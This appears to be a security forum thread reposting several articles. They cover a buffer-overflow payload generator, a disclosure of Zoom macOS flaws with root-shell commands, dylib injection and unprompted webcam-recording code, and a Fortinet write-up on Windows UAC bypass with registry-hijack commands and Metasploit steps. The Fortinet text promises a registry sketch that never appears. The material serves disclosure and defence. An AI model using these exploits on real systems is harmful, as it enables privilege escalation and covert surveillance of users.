Concluding this first part, I hope I have aroused your curiosity and interest in this wonderful topic. Buffer overflows are one of the many ways memory corruption can be achieved. In the upcoming episodes we will explore more techniques and strategies. Until next time!

Sursa: https://medium.com/cyber-dacians/binary-exploitation-01-introduction-9fcd2cdce9c6
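The payload from the walkthrough above can be generated rather than typed by hand. A minimal sketch, assuming the vulnerable binary is ./program (a placeholder name) and reusing the 0x4005c7 address the article found with objdump:

import struct
import sys

# 48 bytes of padding (as in the article), then the address of
# takeover_the_world() packed as a little-endian 64-bit value
payload = b"A" * 32 + b"a" * 16 + struct.pack("<Q", 0x4005c7)
sys.stdout.buffer.write(payload + b"\n")

Piped into the target (python3 payload.py | ./program), this reproduces the redirect; struct.pack("<Q", 0x4005c7) yields exactly the '\xc7\x05\x40\x00\x00\x00\x00\x00' bytes shown above.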
-
Objective-See

The 'S' in Zoom, Stands for Security: uncovering (local) security flaws in Zoom's latest macOS client

by: Patrick Wardle / March 30, 2020

📝 Update: Zoom has patched both bugs in Version 4.6.9 (19273.0402). For more details see: New Updates for macOS

Background

Given the current worldwide pandemic and government-sanctioned lock-downs, working from home has become the norm …for now. Thanks to this, Zoom, "the leader in modern enterprise video communications", is well on its way to becoming a household verb, and as a result, its stock price has soared! 📈 However, if you value either your (cyber) security or privacy, you may want to think twice about using (the macOS version of) the app.

In this blog post, we'll start by briefly looking at recent security and privacy flaws that affected Zoom. Following this, we'll transition into discussing several new security issues that affect the latest version of Zoom's macOS client.

📝 Though the new issues we'll discuss today remain unpatched, they are both local security issues. As such, to be successfully exploited they require that malware or an attacker already have a foothold on the macOS system.

Though Zoom is incredibly popular, it has a rather dismal security and privacy track record. In June 2019, the security researcher Jonathan Leitschuh discovered a trivially exploitable remote 0day vulnerability in the Zoom client for Mac, which "allow[ed] any malicious website to enable your camera without your permission" 😱

"This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user's permission. Additionally, if you've ever installed the Zoom client and then uninstalled it, you still have a localhost web server on your machine that will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage. This re-install 'feature' continues to work to this day." -Jonathan Leitschuh

📝 Interested in more details? Read Jonathan's excellent writeup: "Zoom Zero Day: 4+ Million Webcams & maybe an RCE?".

Rather hilariously, Apple (forcibly!) removed the vulnerable Zoom component from users' Macs worldwide via macOS's Malware Removal Tool (MRT). AFAIK, this is the only time Apple has taken this draconian action.

More recently, Zoom suffered a rather embarrassing privacy faux pas, when it was uncovered that their iOS application was "send[ing] data to Facebook even if you don't have a Facebook account" …yikes!

📝 Interested in more details? Read Motherboard's writeup: "Zoom iOS App Sends Data to Facebook Even if You Don't Have a Facebook Account".

Although Zoom was quick to patch the issue (by removing the (ir)responsible code), many security researchers were quick to point out that said code should never have made it into the application in the first place.

And finally, today, macOS security researcher Felix Seele (and #OBTS v2.0 speaker!) noted that Zoom's macOS installer (rather shadily) performs its "[install] job without you ever clicking install":

"This is not strictly malicious but very shady and definitely leaves a bitter aftertaste. The application is installed without the user giving his final consent and a highly misleading prompt is used to gain root privileges. The same tricks that are being used by macOS malware."
-Felix Seele

📝 For more details on this, see Felix's comprehensive blog post: "Good Apps Behaving Badly: Dissecting Zoom's macOS installer workaround"

The (preinstall) scripts mentioned by Felix can be easily viewed (and extracted) from Zoom's installer package via the Suspicious Package application:

Local Zoom Security Flaw #1: Privilege Escalation to Root

Zoom's security and privacy track record leaves much to be desired. As such, today when Felix Seele also noted that the Zoom installer may invoke the AuthorizationExecuteWithPrivileges API to perform various privileged installation tasks, I decided to take a closer look. Almost immediately I uncovered several issues, including a vulnerability that leads to a trivial and reliable local privilege escalation (to root!).

Stop me if you've heard me talk (rant) about this before, but Apple clearly notes that the AuthorizationExecuteWithPrivileges API is deprecated and should not be used. Why? Because the API does not validate the binary that will be executed (as root!) …meaning a local unprivileged attacker or piece of malware may be able to surreptitiously tamper with or replace that item in order to escalate their privileges to root (as well).

At DefCon 25, I presented a talk titled "Death By 1000 Installers" that covers this in great detail …moreover, in my blog post "Sniffing Authentication References on macOS" from just last week, we covered this in great detail as well! Finally, this insecure API was (also) discussed in detail at "Objective by the Sea" v3.0, in a talk (by Julia Vashchenko) titled "Job(s) Bless Us! Privileged Operations on macOS".

Now, it should be noted that if the AuthorizationExecuteWithPrivileges API is invoked with a path to a (SIP-)protected or read-only binary (or script), this issue would be thwarted (as in such a case, unprivileged code or an attacker may not be able to subvert the binary/script). So the question here, in regard to Zoom, is: "How are they utilizing this inherently insecure API?" Because if they are invoking it insecurely, we may have a lovely privilege escalation vulnerability!

As discussed in my DefCon presentation, the easiest way to answer this question is simply to run a process monitor, execute the installer package (or whatever invokes the AuthorizationExecuteWithPrivileges API), and observe the arguments that are passed to security_authtrampoline (the setuid system binary that ultimately performs the privileged action).

The image above illustrates the flow of control initiated by the AuthorizationExecuteWithPrivileges API and shows how the item (binary, script, command, etc.) that is to be executed with root privileges is passed as the first parameter to the security_authtrampoline process. If this parameter, this item, is editable (i.e. can be maliciously subverted) by an unprivileged attacker, then that's a clear security issue!

Let's figure out what Zoom is executing via AuthorizationExecuteWithPrivileges! First we download the latest version of Zoom's installer for macOS (Version 4.6.8 (19178.0323)) from https://zoom.us/download. Then, we fire up our macOS Process Monitor (https://objective-see.com/products/utilities.html#ProcessMonitor), and launch the Zoom installer package (Zoom.pkg).
If the user installing Zoom is running as a 'standard' (read: non-admin) user, the installer may prompt for administrator credentials …and, as expected, our process monitor will observe the launching (ES_EVENT_TYPE_NOTIFY_EXEC) of /usr/libexec/security_authtrampoline to handle the authorization request:

# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty
{
  "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
  "process" : {
    "uid" : 0,
    "arguments" : [
      "/usr/libexec/security_authtrampoline",
      "./runwithroot",
      "auth 3",
      "/Users/tester/Applications/zoom.us.app",
      "/Applications/zoom.us.app"
    ],
    "ppid" : 1876,
    "ancestors" : [ 1876, 1823, 1820, 1 ],
    "signing info" : {
      "csFlags" : 603996161,
      "signatureIdentifier" : "com.apple.security_authtrampoline",
      "cdHash" : "DC98AF22E29CEC96BB89451933097EAF9E01242",
      "isPlatformBinary" : 1
    },
    "path" : "/usr/libexec/security_authtrampoline",
    "pid" : 1882
  },
  "timestamp" : "2020-03-31 03:18:45 +0000"
}

And what is Zoom attempting to execute as root (i.e. what is passed to security_authtrampoline)? …a bash script named runwithroot. If the user provides the requested credentials to complete the install, the runwithroot script will be executed as root (note: uid 0):

{
  "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
  "process" : {
    "uid" : 0,
    "arguments" : [
      "/bin/sh",
      "./runwithroot",
      "/Users/tester/Applications/zoom.us.app",
      "/Applications/zoom.us.app"
    ],
    "ppid" : 1876,
    "ancestors" : [ 1876, 1823, 1820, 1 ],
    "signing info" : {
      "csFlags" : 603996161,
      "signatureIdentifier" : "com.apple.sh",
      "cdHash" : "D3308664AA7E12DF271DC78A7AE61F27ADA63BD6",
      "isPlatformBinary" : 1
    },
    "path" : "/bin/sh",
    "pid" : 1882
  },
  "timestamp" : "2020-03-31 03:18:45 +0000"
}

The contents of runwithroot are irrelevant. All that matters is: can a local, unprivileged attacker (or piece of malware) subvert the script prior to its execution as root? (Again, recall that the AuthorizationExecuteWithPrivileges API does not validate what is being executed.)

Since it's Zoom we're talking about, the answer is of course yes! 😅 We can confirm this by noting that during the installation process, the macOS Installer (which handles installations of .pkgs) copies the runwithroot script to a user-writable temporary directory:

tester@users-Mac T % pwd
/private/var/folders/v5/s530008n11dbm2n2pgzxkk700000gp/T
tester@users-Mac T % ls -lart com.apple.install.v43Mcm4r
total 27224
-rwxr-xr-x 1 tester staff    70896 Mar 23 02:25 zoomAutenticationTool
-rw-r--r-- 1 tester staff      513 Mar 23 02:25 zoom.entitlements
-rw-r--r-- 1 tester staff 12008512 Mar 23 02:25 zm.7z
-rwxr-xr-x 1 tester staff      448 Mar 23 02:25 runwithroot
...

Lovely - it looks like we're in business and may be able to gain root privileges! Exploitation of these types of bugs is trivial and reliable (though it requires some patience …as you have to wait for the installer or updater to run!), as is shown in the following diagram.

To exploit Zoom, a local non-privileged attacker can simply replace or subvert the runwithroot script during an install (or upgrade?) to gain root access. For example, to pop a root shell, simply add the following commands to the runwithroot script:

cp /bin/ksh /tmp
chown root:wheel /tmp/ksh
chmod u+s /tmp/ksh
open /tmp/ksh

Le boom 💥

Local Zoom Security Flaw #2: Code Injection for Mic & Camera Access

In order for Zoom to be useful, it requires access to the system's mic and camera.
On recent versions of macOS, this requires explicit user approval (which, from a security and privacy point of view, is a good thing). Unfortunately, Zoom has (for reasons unbeknown to me) a specific "exclusion" that allows malicious code to be injected into its process space, where said code can piggy-back on Zoom's (mic and camera) access! This gives malicious code a way to either record Zoom meetings, or worse, access the mic and camera at arbitrary times (without the user access prompt)!

Modern macOS applications are compiled with a feature called the "Hardened Runtime". This security enhancement is well documented by Apple, who note:

"The Hardened Runtime, along with System Integrity Protection (SIP), protects the runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering." -Apple

I'd like to think that Apple attended my 2016 talk at ZeroNights in Moscow, where I noted this feature would be a great addition to macOS.

We can check that Zoom (or any application) is validly signed and compiled with the "Hardened Runtime" via the codesign utility:

$ codesign -dvvv /Applications/zoom.us.app/
Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
Identifier=us.zoom.xos
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20500 size=663 flags=0x10000(runtime) hashes=12+5 location=embedded
...
Authority=Developer ID Application: Zoom Video Communications, Inc. (BJ4HAAB9B3)
Authority=Developer ID Certification Authority
Authority=Apple Root CA

A flags value of 0x10000(runtime) indicates that the application was compiled with the "Hardened Runtime" option, and thus said runtime should be enforced by macOS for this application. OK, so far so good! Code injection attacks should be generically thwarted due to this! …but (again) this is Zoom, so not so fast 😅

Let's dump Zoom's entitlements (entitlements are code-signed capabilities and/or exceptions), again via the codesign utility:

codesign -d --entitlements :- /Applications/zoom.us.app/
Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN...>
<plist version="1.0">
<dict>
  <key>com.apple.security.automation.apple-events</key>
  <true/>
  <key>com.apple.security.device.audio-input</key>
  <true/>
  <key>com.apple.security.device.camera</key>
  <true/>
  <key>com.apple.security.cs.disable-library-validation</key>
  <true/>
  <key>com.apple.security.cs.disable-executable-page-protection</key>
  <true/>
</dict>
</plist>

The com.apple.security.device.audio-input and com.apple.security.device.camera entitlements are required, as Zoom needs (user-approved) mic and camera access. However, the com.apple.security.cs.disable-library-validation entitlement is interesting. In short, it tells macOS, "hey, yah, I still (kinda?) want the 'Hardened Runtime', but please allow any libraries to be loaded into my address space" …in other words, library injections are a go! Apple documents this entitlement as well.

So, thanks to this entitlement, we can (in theory) circumvent the "Hardened Runtime" and inject a malicious library into Zoom (for example, to access the mic and camera without an access alert). There are a variety of ways to coerce a remote process to load a dynamic library at load time, or at runtime. Here we'll focus on a method I call "dylib proxying", as it's both stealthy and persistent (malware authors, take note!).
In short, we replace a legitimate library that the target (i.e. Zoom) depends on, then proxy all requests made by Zoom back to the original library, to ensure legitimate functionality is maintained. Both the app and the user remain none the wiser!

📝 Another benefit of "dylib proxying" is that it does not compromise the code signing certificate of the binary (however, it may affect the signature of the application bundle). A benefit of this is that Apple's runtime signature checks (e.g. for mic & camera access) do not seem to detect the malicious library, and thus still afford the process continued access to the mic & camera.

This is a method I've often (ab)used before in a handful of exploits, for example to (previously) bypass SIP. As the image illustrates, one could proxy the IASUtilities library so that malicious code would be automatically loaded ('injected') by the macOS dynamic linker (dyld) into Apple's installer (a prerequisite for the SIP bypass exploit). Here, we'll similarly proxy a library (required by Zoom), such that our malicious library will be automatically loaded into Zoom's trusted process address space any time it's launched.

To determine which libraries Zoom is linked against (read: requires), and thus which will be automatically loaded by the macOS dynamic loader, we can use otool with the -L flag:

$ otool -L /Applications/zoom.us.app/Contents/MacOS/zoom.us
/Applications/zoom.us.app/Contents/MacOS/zoom.us:
  @rpath/curl64.framework/Versions/A/curl64
  /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
  /usr/lib/libobjc.A.dylib
  /usr/lib/libc++.1.dylib
  /usr/lib/libSystem.B.dylib
  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
  /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices

📝 Due to macOS's System Integrity Protection (SIP), we cannot replace any system libraries. As such, for an application to be 'vulnerable' to "dylib proxying" it must load a library from either its own application bundle or another non-SIP'd location (and must not be compiled with the "Hardened Runtime" — well, unless it has the com.apple.security.cs.disable-library-validation entitlement exception).

Looking at Zoom's library dependencies, we see @rpath/curl64.framework/Versions/A/curl64. We can resolve the runpath (@rpath) again via otool, this time with the -l flag:

$ otool -l /Applications/zoom.us.app/Contents/MacOS/zoom.us
...
Load command 22
cmd LC_RPATH
cmdsize 48
path @executable_path/../Frameworks (offset 12)

The @executable_path will be resolved at runtime to the binary's path; thus the dylib will be loaded out of /Applications/zoom.us.app/Contents/MacOS/../Frameworks, or more specifically /Applications/zoom.us.app/Contents/Frameworks. Taking a peek at Zoom's application bundle, we can confirm the presence of the curl64 framework (and many other frameworks and libraries) that will all be loaded whenever Zoom is launched.

📝 For details on "runpaths" (@rpath) and executable paths (@executable_path), as well as more information on creating a proxy dylib, check out my paper: "Dylib Hijacking on OS X"

For simplicity's sake, we'll target Zoom's libssl.1.0.0.dylib (as it's a stand-alone library, versus a framework/bundle) as the library we'll proxy. Step #1 is to rename the legitimate library.
For example, here we simply prefix it with an underscore: _libssl.1.0.0.dylib. Now, if we run Zoom, it will (as expected) crash, as a library it requires (libssl.1.0.0.dylib) is 'missing':

patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us
dyld: Library not loaded: @rpath/libssl.1.0.0.dylib
Referenced from: /Applications/zoom.us.app/Contents/Frameworks/curl64.framework/Versions/A/curl64
Reason: image not found
Abort trap: 6

This is actually good news, as it means that if we place any library named libssl.1.0.0.dylib in Zoom's Frameworks directory, dyld will (blindly) attempt to load it. Step #2: let's create a simple library, with a custom constructor (that will be automatically invoked when the library is loaded):

__attribute__((constructor))
static void constructor(void)
{
    char path[PROC_PIDPATHINFO_MAXSIZE];
    proc_pidpath(getpid(), path, sizeof(path)-1);

    NSLog(@"zoom zoom: loaded in %d: %s", getpid(), path);

    return;
}

…and save it to /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib. Then we re-run Zoom:

patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us
zoom zoom: loaded in 39803: /Applications/zoom.us.app/Contents/MacOS/zoom.us

Hooray! Our library is loaded by Zoom. Unfortunately, Zoom then exits right away. This is also not unexpected, as our libssl.1.0.0.dylib is not an SSL library …that is to say, it doesn't export any of the required functionality (i.e. SSL capabilities!). So Zoom (gracefully) fails. Not to worry: this is where the beauty of "dylib proxying" shines.

Step #3: via simple linker directives, we can tell Zoom, "hey, while our library doesn't implement the required (SSL) functionality you're looking for, we know who does!" and then point Zoom to the original (legitimate) SSL library (that we renamed _libssl.1.0.0.dylib). To create the required linker directive, we add -Xlinker -reexport_library and then the path to the proxy-library target, under "Other Linker Flags" in Xcode.

To complete the creation of the proxy library, we must also update the embedded reexport path (within our proxy dylib) so that it points to the (original, albeit renamed) SSL library. Luckily, Apple provides the install_name_tool utility just for this purpose:

patrick$ install_name_tool -change @rpath/libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib

We can now confirm (via otool) that our proxy library references the original SSL library. Specifically, we note that our proxy dylib (libssl.1.0.0.dylib) contains an LC_REEXPORT_DYLIB load command that points to the original SSL library (_libssl.1.0.0.dylib):

patrick$ otool -l /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib
...
Load command 11
cmd LC_REEXPORT_DYLIB
cmdsize 96
name /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib
time stamp 2 Wed Dec 31 14:00:02 1969
current version 1.0.0
compatibility version 1.0.0

Re-running Zoom confirms that our proxy library (and the original SSL library) are both loaded, and that Zoom functions perfectly, as expected! 🔥

The appeal of injecting a library into Zoom revolves around its (user-granted) access to the mic and camera. Once our malicious library is loaded into Zoom's process/address space, the library will automatically inherit any/all of Zoom's access rights/permissions!
This means that if the user has given Zoom access to the mic and camera (a more than likely scenario), our injected library can equally access those devices.

📝 If Zoom has not been granted access to the mic or the camera, our library should be able to programmatically detect this (to silently 'fail') …or we can go ahead and still attempt to access the devices, as the access prompt will originate "legitimately" from Zoom and thus is likely to be approved by the unsuspecting user.

To test this "access inheritance", I added some code to the injected library to record a few seconds of video off the webcam:

AVCaptureDevice* device = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo];

session = [[AVCaptureSession alloc] init];
output = [[AVCaptureMovieFileOutput alloc] init];

AVCaptureDeviceInput *input = [AVCaptureDeviceInput deviceInputWithDevice:device error:nil];

movieFileOutput = [[AVCaptureMovieFileOutput alloc] init];

[self.session addInput:input];
[self.session addOutput:output];
[self.session addOutput:movieFileOutput];

[self.session startRunning];

[movieFileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"zoom.mov"] recordingDelegate:self];

//stop recording after 5 seconds
[NSTimer scheduledTimerWithTimeInterval:5 target:self selector:@selector(finishRecord:) userInfo:nil repeats:NO];

...

Normally this code would trigger an alert from macOS, asking the user to confirm access to the mic and camera. However, as we're injected into Zoom (which was already given access by the user), no additional prompts are displayed, and the injected code was able to arbitrarily record audio and video. Interestingly, the test captured the real brains behind this research.

📝 Could malware (ab)use Zoom to capture audio and video at arbitrary times (i.e. to spy on users)? If Zoom is installed and has been granted access to the mic and camera, then yes! In fact, the /usr/bin/open utility supports the -j flag, which "launches the app hidden"! Voila!

Conclusion

Today, we uncovered two (local) security issues affecting Zoom's macOS application. Given Zoom's privacy and security track record, this should surprise absolutely zero people. First, we illustrated how unprivileged attackers or malware may be able to exploit Zoom's installer to gain root privileges. Following this, due to an 'exception' entitlement, we showed how to inject a malicious library into Zoom's trusted process context. This affords malware the ability to record all Zoom meetings, or simply spawn Zoom in the background to access the mic and webcam at arbitrary times! 😱

The former is problematic as many enterprises (now) utilize Zoom for (likely) sensitive business meetings, while the latter is problematic as it affords malware the opportunity to surreptitiously access either the mic or the webcam, with no macOS alerts and/or prompts. OSX.FruitFly v2.0, anybody?

So, what to do? Honestly, if you care about your security and/or privacy, perhaps stop using Zoom. And if using Zoom is a must, I've written several free tools that may help detect these attacks. 😇 First, OverSight can alert you anytime anybody accesses the mic or webcam. Thus, even if an attacker or malware is (ab)using Zoom "invisibly" in the background, OverSight will generate an alert. Another (free) tool is KnockKnock, which can generically detect proxy libraries …it's almost as if offensive cyber-security research can facilitate the creation of powerful defensive tools!
Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page!

Sursa: https://objective-see.com/blog/blog_0x56.html
-
Offense and Defense – A Tale of Two Sides: Bypass UAC

By Anthony Giandomenico | April 01, 2020

FortiGuard Labs Threat Analysis

Introduction

In this month's "Offense and Defense – A Tale of Two Sides" blog, we will be walking through a new technique in sequence, as it would happen in a real attack. Since I discussed downloading and executing a malicious payload with PowerShell last time, the next logical step is escalating privileges, which is why we will be focusing on the Bypass User Account Control (UAC) attack technique. Once the bad guys have managed to breach defenses and get into a system, they need to make sure they have the right permissions to complete whatever their tasks might be. One of the first obstacles they typically face is trying to bypass the UAC.

It's important to note that, while very common, Bypass UAC is a much weaker version of a Local Privilege Escalation attack. There are much more sophisticated exploits in the wild that allow for sandbox escapes, or for becoming a privileged (system) user on a device owned by a least-privileged user. But we will save those other topics for another day.

User Account Control Review

Before we start, we all need a basic understanding of how UAC works. UAC is an access control feature introduced with Microsoft Windows Vista and Windows Server 2008 (and included in pretty much all Windows versions after that). The main intent of UAC is to make sure applications are limited to standard user privileges. If a user requires an increase in access privileges, the administrator of the device (usually the owner) needs to authorize that change by actively responding to a prompt.

We should all be familiar with this user experience. When additional privileges are needed, a pop-up prompt asks, "Do you want to allow the following program to make changes to this computer?" If you have the full access token (i.e. you are logged in as the administrator of the device, or you are part of the administrators group), you can select 'yes' and be on your way. If you've been assigned a standard user access token, however, you will be prompted to enter credentials for an administrator who does have the privileges.

Figure 1. UAC Consent Prompt
Figure 2. UAC Credential Prompt

NOTE: When you first log in to a Windows 10 machine as a non-admin user, you are granted a standard access token. This token contains information about the level of access you are being granted, including SIDs and Windows privileges. The login process for an administrator is similar. They get the same standard token as the non-admin user, but they also get an additional token that provides admin access. This explains why an administrative user is still prompted with the UAC consent prompt even though they have the appropriate access privilege: the system looks at the standard access token first. If you give your consent by selecting yes, the admin access token kicks in and you are on your merry way.

The goal of this feature was to limit accidental system changes and keep malware from compromising a system, since elevating privileges requires an additional user intervention to verify that the change is what the user intended, and that only trusted apps receive admin privileges.

One other item that is important to understand is that Windows 10 protects processes by marking them with certain integrity levels. Below are the highest and lowest integrity levels.
High Integrity (Highest) – apps assigned this level can make modifications to system data. Some executables may have auto-elevate abilities. I will dive into this later.

Low Integrity (Lowest) – apps that perform a task that could be harmful to the operating system.

There is much more information available out there on the UAC feature, but I think what we have covered gives us the background we need to proceed.

Bypass User Account Control

The UAC feature seems like a good measure for preventing malware from compromising a system. Unfortunately, it turns out that criminals have discovered ways to bypass the UAC feature, many of which are pretty trivial. Many of them depend on the specific configuration setting of UAC. Below are a few examples of UAC bypass techniques that have been built into the open-source Metasploit tool to help you test your systems:

UAC protection bypass using Fodhelper and the Registry Key
UAC protection bypass using Eventvwr and the Registry Key
UAC protection bypass using COM Handler Hijack

The first two take advantage of auto-elevation within Windows. If a binary is trusted – meaning it has been signed with a MS certificate and is located in a trusted directory, like c:\windows\system32 – the UAC consent prompt will not engage. Both Fodhelper.exe and Eventvwr.exe are trusted binaries. In the Fodhelper example, when that executable is run it looks for two registry keys to run additional commands. One of those registry keys can be modified, so if you put custom commands in there, they run at the privilege level of the trusted fodhelper.exe file (a sketch of these registry writes appears at the end of this article).

It's worth mentioning that these techniques only work if the user is already in the administrators group. If you're on a system as a standard user, they will not work. You might ask yourself, "why do I need to perform this bypass if I'm already an admin?" The answer is that if the adversary is on the box remotely, how do they select the yes button when the UAC consent prompt appears? They can't, so the only way forward is to get around the prompt itself.

The COM handler bypass is similar, as it references specific registry (COM handler) entries that can be created and then referenced when a high integrity process is loaded.

On a side note, if you want to see which executables can auto-elevate, try using the strings program which is part of Sysinternals:

Example: strings -s c:\windows\system32\*.exe | findstr /i autoelevate

As I mentioned, there are many more bypass UAC techniques. If you want to explore more — which I think you should, to ensure you're protected against them, or can at least detect them — you can start at this GitHub site (UACMe).

Defenses against Bypass UAC

Now that we understand that bypassing the UAC controls is possible, let's talk about the defenses you have against these attacks. You have four settings for User Account Control in Windows 7/10. The setting options are listed below.

Always notify
Probably the most secure setting. If you select this, it will always notify you when you make changes to your system, such as installing software programs or making direct changes to Windows settings. When the UAC prompt is displayed, other tasks are frozen until you respond.

Notify me only when programs try to make changes to my computer
This setting is similar to the first. It will notify you when installing software programs and will freeze all other tasks until you respond to the prompt. However, it will not notify you when you make changes to Windows settings yourself.
Notify me only when programs try to make changes to my computer (do not dim my desktop)
As the setting name suggests, it's the same as the one above, but when the UAC consent prompt appears, other tasks on the system will not freeze.

Never notify (Disable UAC)
I think it's obvious what this setting does. It disables User Account Control.

The default setting for UAC is "Notify me only when programs try to make changes to my computer." I mention this because some attack techniques will not work if you have UAC set to "Always notify." A word to the wise.

Another great defense against this technique is to simply not run as administrator. Even if you own the device, work as a standard user and elevate privileges as needed when performing tasks that require them. This sounds like a no-brainer, but many organizations still provide admin privileges to all users. The reasoning is usually that it's easier. That's true, but it's also easier for the bad guys.

Privilege escalation never really happens as a single event. It is multiple techniques chained together, each dependent on the one before it successfully executing. So with that in mind, the best way to break the attack chain is to prevent any of these techniques from successfully completing – and the best place to do this is usually by blocking a technique in the execution tactic category, or earlier, at delivery. If the adversary cannot get a foothold on the box, they certainly are not going to be able to execute a bypass UAC technique. If you're interested in learning more about technique chaining and dependencies, Andy Applebaum gave a nice presentation at the FIRST Conference that you might want to take a look at.

One common question people ask is, "why are there no CVEs for these UAC security bypass attacks?" It's because Microsoft doesn't consider UAC to be a security boundary, so you will not see them in the regular Patch Tuesdays.

Real-World Examples & Detections

Over the years, our FortiGuard Labs team has discovered many threats that include a bypass UAC technique. A great example is a threat we discovered a few years back that contained the Fareit malware. A Fareit payload typically steals credentials and downloads other payloads. This particular campaign was delivered via a phishing email containing a malicious macro that called a PowerShell script to download a file named sick.exe. This seems like a typical attack strategy, but to execute the sick.exe payload it used the high integrity (auto-elevated) eventvwr.exe to bypass the UAC consent prompt. Below is the PowerShell script.

Figure 3. PowerShell Script

You can see that the first part of the script downloads the malicious file using the (New-Object System.Net.WebClient).DownloadFile() method we discussed in the first blog in this series. The second part of the script adds an entry to the registry using the command reg add HKCU\Software\Classes\mscfile\shell\open\command /d %tmp%\sick.exe /f.

Figure 4. Registry Modified by PowerShell Script

Finally, the last command in the script runs eventvwr.exe, which needs to run MMC. As I discussed earlier, the exe queries both HKCU\Software\Classes\mscfile\shell\open\command\ and HKCR\mscfile\shell\open\command\. When it does so, it will find sick.exe as an entry and will execute that instead of the MMC.

Our 24/7 FortiResponder Managed Detection and Response team also sees a good amount of bypass UAC activity in our customers' environments.
Usually, the threat is stopped earlier in the attack chain, before it has a chance to run the technique, but there are occasions when it is able to progress beyond that point. We also observe it if the FortiEDR configuration is in simulation mode. A recent technique we detected and blocked was a newer version of Trickbot. When this payload runs, it tries to execute the WSReset UAC bypass technique to circumvent the UAC prompt. Once again, it leverages an executable that has higher integrity (and higher privilege) and has the autoElevate property enabled. This specific bypass works on Windows 10. If the payload encounters Windows 7, it will instead use the CMSTPLUA UAC bypass technique. In Figure 5 you can see our FortiEDR forensic technology identify reg.exe trying to modify the registry value with DelegateExecute.

Figure 5. FortiEDR technology detecting a bypass UAC technique

Our FortiSIEM customers can take advantage of rules to detect some of these UAC bypass techniques. Below is an example rule to detect a UAC bypass using the Windows backup tool sdclt.exe and the Eventvwr version we mentioned before.

Figure 6. FortiSIEM rule to detect some Bypass UAC techniques

Below, in Figure 7, we can see the sub-patterns for the rule detecting the eventvwr bypass UAC version.

Figure 7. FortiSIEM SubPattern to detect Bypass UAC technique using eventvwr.exe

If you're not using a technology like FortiEDR or FortiSIEM, you could start monitoring on your own (using Sysmon). But again, it could be difficult, since there are so many variations. In general, you can look for registry changes or additions in certain areas, and for the auto-elevated files being used, depending on the specific bypass UAC technique. For the eventvwr.exe version, you could look for new entries in HKCU\Software\Classes. Also keep an eye on the consent.exe file, since it's the one that launches the user interface for UAC. Look at the amount of time between the start and the end of the consent process: if it's milliseconds, it's not being done by a human but by an automated process. Lastly, when looking at the entire UAC process, a legitimate execution is usually much simpler in nature, whereas a bypass UAC process is a bit more complex, and noisier in the logs. You will have to do a lot of research to figure out the right rules to trigger on. It's probably better to just get a technology that can help prevent or detect the technique. This should save you a lot of time and personnel overhead.

Reproducing the Techniques

Once you've done your research on the technique, it's time to figure out how to reproduce it, so you can determine whether or not you detect it. Some of the same tools I mentioned last time apply, but there are a few that are fairly easy to use. Below are a few examples.

Simulation Tool

Atomic Red Team has some very basic tests you can use to simulate a UAC bypass. Figure 8, below, lists them.

Figure 8. A list of Bypass UAC tests

Open Source Defense Testing Tool

As I mentioned earlier, Metasploit has a few bypass UAC techniques you can leverage. Remember that in the attack chain, your adversary already has an initial foothold on the box, and they are trying to get around UAC. With that said, you should already have a meterpreter session running on your test box. Executing the steps to run a bypass UAC technique (using fodhelper) is pretty simple. First, put your meterpreter session in the background by typing the command background. Next, type use exploit/windows/local/bypassuac_fodhelper.
From there you need to point the exploit at your Meterpreter session. Type set session <your session #> and then type exploit. If you're successful, you should see something on your screen that looks like what's shown in Figure 9, below.
Figure 9. Successful bypass UAC using fodhelper
Lastly, in video 1 below, I walk you through a UAC bypass technique available in Metasploit. I had established initial access and ended up with a Meterpreter session. From there I tried to add a registry entry for persistence, but didn't have the right access. I then tried to run the getsystem command, but that failed as well. This is usually because UAC is enabled. I then selected one of the UAC bypass techniques, which allowed me to elevate my privileges and add my persistence entry to the registry.
Conclusion
Once again, we continue to play the cat and mouse game. As an industry we build protections (in this case UAC) and eventually the adversary finds ways around them. This will most likely not change. So the important task is understanding your strengths and weaknesses against these real-world attacks. If you struggle with keeping up to date with all of this, you can always turn to your consulting partner or vendor to make sure you have the right security controls and services in place to keep up with the latest threats, and that you are also able to address the risk and identify malicious activities using such tools as EDR, MDR, UEBA, and SIEM technologies.
I will close this blog like I did last time. As you go through the process of testing each UAC bypass attack technique, it is important to not only understand the technique, but also be able to simulate it. Then, monitor your security controls, evaluate if any gaps exist, and document and make the improvements needed for coverage.
Stay tuned for our next MITRE ATT&CK technique blog - Credential Dumping.
Find out more about how FortiResponder Services enable organizations to achieve continuous monitoring as well as incident response and forensic investigation. Learn how FortiGuard Labs provides unmatched security and intelligence services using integrated AI systems. Find out about the FortiGuard Security Services portfolio and sign up for our weekly FortiGuard Threat Brief. Discover how the FortiGuard Security Rating Service provides security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.
Sursa: https://www.fortinet.com/blog/threat-research/offense-and-defense-a-tale-of-two-sides-bypass-uac.html
-
pspy - unprivileged Linux process snooping
